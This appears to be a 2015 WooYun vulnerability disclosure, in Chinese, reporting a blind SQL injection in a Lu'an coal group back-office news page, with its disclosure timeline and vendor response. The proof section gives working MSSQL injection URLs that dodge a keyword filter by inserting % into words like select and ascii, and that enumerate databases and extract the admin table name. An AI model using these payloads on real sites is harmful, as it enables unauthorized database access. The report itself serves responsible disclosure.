漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0150110
漏洞标题: 五大煤炭企业集团之一潞安集团某后台SQL注入一枚
相关厂商:潞安集团
漏洞作者: 路人甲
提交时间:2015-10-28 17:53
修复时间:2015-12-14 17:54
公开时间:2015-12-14 17:54
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:9
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-28: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开
简要描述:
MSSQL盲注,关键字过滤被绕过,11个库
详细说明:
注入点:http://**.**.**.**/BG/nzcms_list_news.asp?id=724&sort_id=664
参数:sort_id=664
类型:blind
漏洞证明:
1. '、and 1=1 、and 1=2判断注入点,and、select、ascii等关键字会被过滤,用%绕过
2.判断库类型:
http://**.**.**.**/BG/nzcms_list_news.asp?id=724&sort_id=664%20and%20substring((se%lect%20@@version),22,4)=%272005%27 返回正确的页面
3.猜数据库:
先猜dbid:
http://**.**.**.**/BG/nzcms_list_news.asp?id=724&sort_id=664%20and%20(se%lect%20count(*)%20from%20master.dbo.sysdatabases%20where%20dbid=11)=1 一共有11个库
http://**.**.**.**/BG/nzcms_list_news.asp?id=724&sort_id=664%20and%20(s%elect%20count(*)%20from%20master.dbo.sysdatabases%20where%20dbid=11%20and%20len(name)=3)=1 猜长度
逐位猜:
http://**.**.**.**/BG/nzcms_list_news.asp?id=724&sort_id=664%20a%nd%20(se%lect%20count(*)%20from%20master.dbo.sysdatabases%20where%20dbid=11and%20a%scii(substring(name,1,1))=79)=1 数据库有LAW master temper LAHQGJJ等,用最后一个LAHQGJJ猜表
猜第一个表名,逐位猜:
http://**.**.**.**/BG/nzcms_list_news.asp?id=724&sort_id=664%20a%nd%20(se%lect%20count(*)%20from%20LAHQGJJ.dbo.sysobjects%20where%20name%20in%20(se%lect%20top%201%20name%20from%20LAHQGJJ.dbo.sysobjects%20where%20xtype=%27u%27)%20and%20as%cii(substring(name,7,1))=110)=1 HTTP/1.1
得到表名t_admin
先到这里……
修复方案:
过滤吧
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-10-30 17:52
厂商回复:
暂未建立与网站管理单位的直接处置渠道,待认领。
最新状态:
暂无